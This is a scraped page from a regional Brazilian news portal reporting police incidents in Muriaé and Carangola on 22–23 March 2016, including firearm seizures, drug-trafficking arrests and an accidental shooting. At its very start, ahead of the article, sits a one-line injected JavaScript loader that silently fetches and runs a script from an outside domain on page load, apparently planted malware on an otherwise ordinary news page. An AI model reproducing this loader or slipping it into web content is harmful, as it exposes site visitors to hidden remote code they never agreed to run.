;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências Policiais 22 e 23 de março de 2016. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências Policiais 22 e 23 de março de 2016.

pmmgesOCORRÊNCIAS DE DESTAQUE MURIAÉ – 22/03/2016

 76ª CIA PM – MURIAÉ

PM APREENDE ARMA DE FOGO EM MURIAÉ

 

Em 21/03/2016, por volta das 07h40min, na Rua Prefeito Francisco Teodoro Filho, no bairro Aeroporto, após denúncias de que o foragido da justiça V.L.M.S., de 25 anos, estaria na residência de sua avó portando um revólver, militares realizaram o cerco no local, porém o autor evadiu com a arma na mão, fazendo menção de atirar contra um dos militares, o qual no intuito de conter a injusta agressão, efetuou um disparo com sua arma, sem contudo atingi-lo. Durante a fuga, o autor deixou a arma cair, tratando-se de 01 revólver cal.38 com numeração raspada e 05 cartuchos intactos, a qual foi apreendida e encaminhada para a Delegacia de Polícia. Segue rastreamento no intuito de localizar o autor.

 

PM CUMPRE MANDADO DE PRISÃO EM MURIAÉ

 

Em 21/03/2016, por volta das 14h00min, na Rua Presidente Arur Bernardes, no centro da cidade, militares compareceram ao fórum local e cumpriram um mandado de prisão expedido contra A.R.S., de 31 anos, o qual foi conduzido para a Delegacia de Polícia.

 

PM EFETUA PRISÃO POR TRÁFICO DE DROGAS EM MURIAÉ

 

Em 21/03/2016, por volta das 15h44min, na Rua Recreio, no bairro Santa Terezinha, após denúncias de que traficantes estariam ameaçando um morador para que este guardasse drogas e arma, militares realizaram contato com R.F.B., de 36 anos, proprietário do imóvel, que permitiu a entrada e ainda informou o local onde estava todo o material, tratando-se de 01 revólver cal.38, 10 munições cal.380, 52 munições cal.38, 08 balanças de precisão, 01 tablete de maconha, aproximadamente 400g de cocaína, material para embalar drogas e diversas anotações referentes ao tráfico. Relatou ainda que vem sendo ameaçado de morte pelos autores G.C.S., de 20 anos e G.J.S., de 23 anos para guardar todo esse material. Durante rastreamento, os autores foram localizados e presos, sendo os mesmos conduzidos para a Delegacia de Polícia. Um terceiro autor conseguiu evadir, não sendo localizado.

 

PM EFETUA PRISÃO POR TENTATIVA DE HOMICÍDIO EM MURIAÉ

 

Em 21/03/2016, por volta das 23h40min, na Rua Padre José Arnaldo Geets, no bairro São Francisco, após denúncia de que havia uma pessoa baleada no interior de uma residência, militares deslocaram ao local dos fatos juntamente com as equipes do Corpo de Bombeiros e avistaram a vítima M.C., de 34 anos, caída ao solo com um sangramento na testa e já inconsciente, momento em que foi socorrida ao Hospital São Paulo. A esposa da vítima relatou que ouviu um estampido e ao chegar na sala, deparou com E.A.C.M., de 20 anos,sobrinho da vítima, socorrendo-o alegando que não teve intenção de atirar, que havia sido um acidente. Ele relatou aos militares que os dois haviam consumido três garrafas e meia de cerveja e que a vítima foi ao quarto de visita e pegou uma arma de fogo, pedindo a ele que realizasse uma demonstração de adentramento tático. Ele acreditou que a arma estaria desmuniciada, vindo a atingir a vítima na cabeça. Os militares localizaram na sala 01 cartucho intacto cal.7.62 e 01 bucha de maconha. A vítima permanece em estado grave no hospital. O autor foi preso e conduzido para a Delegacia de Polícia juntamente com a arma apreendida, tratando-se de 01 revólver cal.38 com 05 cartuchos intactos e 01 deflagrado.

 

 

75ª CIA PM – CARANGOLA

 

 

PM APREENDE ARMA DE FOGO EM SÃO FRANCISCO DO GLÓRIA

 

Em 21/03/2016, por volta das 17h30min, no Córrego Desengano, Zona Rural da cidade, após denúncia anônima de disparos de arma de fogo, durante abordagem de uma residência abandonada, militares lograram êxito em localizar 01 touca ninja, 01 espingarda cal.26, 01 réplica de pistola cal.380 e vários cartuchos de diversos calibres. Os materiais foram apreendidos e encaminhados para a Delegacia de Polícia. Os autores não foram localizados.

 

 

OCORRÊNCIAS DE DESTAQUE MURIAÉ – 23/03/2016

 76ª CIA PM – MURIAÉ

 PM PRENDE AUTOR DE TRÁFICO DE DROGAS EM MURIAÉ

Em 22/032016, por volta das 20h00min, na Chácara Leblon, militares compareceram à Penitenciária Dr. Manoel Martins Lisboa Júnior, onde os agentes relataram que receberam informações de que o detento A.J.R., de 35 anos, que trabalha no serviço externo, estaria fazendo trasnporte de drogas para o interior da penitenciária. O autor ficou em observação e  evacuou 15 invólucros de maconha, momento em que recebeu voz de prisão e foi conduzido para a Delegacia de Polícia para demais providências.

75ª CIA PM – CARANGOLA

 PM APREENDE ARMA DE FOGO EM FERVEDOURO

Em 22/03/2016, por volta das 17h00min, no Córrego Alto Castelo, Zona Rural da cidade, militares receberam informações de que J.S.S., de 24 anos, estaria de posse de uma arma de fogo. Deslocaram então à residência do autor, onde a esposa do mesmo franqueou a entrada, sendo localizada 01 espingarda cal.28 municiada com 01 cartucho. Ainda foram encontrados mais 04 cartuchos na cozinha. A mulher confirmou que a arma pertence ao seu esposo, sendo a mesma apreendida e encaminhada para a Delegacia de Polícia. O autor não foi localizado.

ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM

RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.